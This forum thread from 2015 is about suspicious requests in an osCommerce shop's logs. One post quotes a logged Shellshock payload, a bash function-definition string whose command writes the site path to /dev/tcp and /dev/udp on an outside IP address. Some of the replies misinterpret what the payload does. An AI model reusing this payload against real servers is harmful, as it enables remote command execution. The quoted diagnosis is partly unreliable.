drillsar 0 Posted February 26, 2015 I installed http error log and noticed a couple of people keep going to find this file: /images/thumbnails/160/160/product/1/yhst-129599579720997_2272_101803540.jpg and it doesnt exist? They trying to hack or what? Share this post Link to post Share on other sites
♥clustersolutions 94 Posted February 26, 2015 Look at the IP and see where the request is coming from. You could have issues in your codes, or there can be bad links that you cannot control. There aren't much to hack with that link... Share this post Link to post Share on other sites
rory1 0 Posted February 26, 2015 I have installed supertracker and i find this... Customer Browser: () { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\" Referred By: /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"?" target="_blank">() { :;}; /bin/bash -c \"echo mysitexxxx/cgi-sys/php5 > /dev/tcp/213.233.161.42/23; echo mysitexxxx/cgi-sys/php5 > /dev/udp/213.233.161.42/80\"? where mysitexxxx = my site with 3 different ways maybe try of hacking? Share this post Link to post Share on other sites
greasemonkey 182 Posted February 26, 2015 It may be just a bot trying to index your images. Share this post Link to post Share on other sites
♥kymation 629 Posted February 27, 2015 @@rory1 That code is trying to grab a copy of your PHP5 install. The IP address is allocated to "AS12660 Sharif University of Technology, Tehran, Iran". My bet is that it's a hack attempt, or trying to get information for one. Regards Jim See my profile for a list of my addons and ways to get support. Share this post Link to post Share on other sites
drillsar 0 Posted February 27, 2015 I would ban that IP definitely looks suspicious even know it may do no good Share this post Link to post Share on other sites
rory1 0 Posted February 27, 2015 @@kymation They succeeded to send spam mail from my site...i made restore from previews days and i ban the ip..now i must find how they doit... Share this post Link to post Share on other sites
♥kymation 629 Posted February 27, 2015 If they were trying to grab a copy of your PHP install, I would assume that they were looking for (and found) a PHP vulnerability. What version of PHP was that? You can probably stop them by upgrading to a newer version of PHP. You should be using PHP 5.5 or higher. Regards Jim See my profile for a list of my addons and ways to get support. Share this post Link to post Share on other sites
rory1 0 Posted February 27, 2015 @@kymation my version is 5.3 i have to contact to my webhost to update it Share this post Link to post Share on other sites
♥kymation 629 Posted February 27, 2015 PHP 5.3 is no longer supported and should be considered insecure. 5.4 is deprecated and support will end this summer. 5.5 is the minimum fully supported version. Make certain that you are running the latest version of osCommerce, as many older versions do not support PHP 5.5. Regards Jim See my profile for a list of my addons and ways to get support. Share this post Link to post Share on other sites
Blue Penguin 0 Posted March 2, 2015 @@kymation - good to know about the php 5.5. I have noticed there seems to be an ability to select options json, soap, pdf. Would anyone know of a useful link for what should be turned on? Or even one that talks about security in php 5.5. -BP Share this post Link to post Share on other sites
♥kymation 629 Posted March 2, 2015 Json is used by some modules (USPS for one) so I would turn that on. Soap is also used to communicate with some external sources. PDF is good if you want to add PDF catalog pages, invoices, etc. PHP 5.5 is still being actively maintained, so I think it is pretty safe. Regards Jim See my profile for a list of my addons and ways to get support. Share this post Link to post Share on other sites
Blue Penguin 0 Posted March 6, 2015 Thank you kymation, I should have stated: I have noticed there seems to be an ability to select many options such as json, soap, pdf, etc. As I am looking at around 100+ of such things. I have worked with 5.4 before with good results, just haven't had enough time to research 5.5 yet. I wasn't sure if a feature of 5.5 was these "new" options or if there is just a admin interface now for turning on and off items? This ability wasn't present with the older versions on my host so it go me to wondering if 5.5 has a special focus to ensure better security. It also got me curious what would be relevant for security or functionality for osCommerce. I know that php has a config file to turn things on and off but haven't gotten to open that up and analyze it yet. Which may or may not be possible as the Host manages settings to ensure their servers are configured well and in many cases their choices on the configuration are done with purpose. -BP Share this post Link to post Share on other sites